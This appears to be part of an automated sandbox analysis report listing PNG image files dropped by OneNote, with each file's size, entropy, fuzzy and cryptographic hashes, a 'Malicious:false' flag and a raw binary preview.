                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
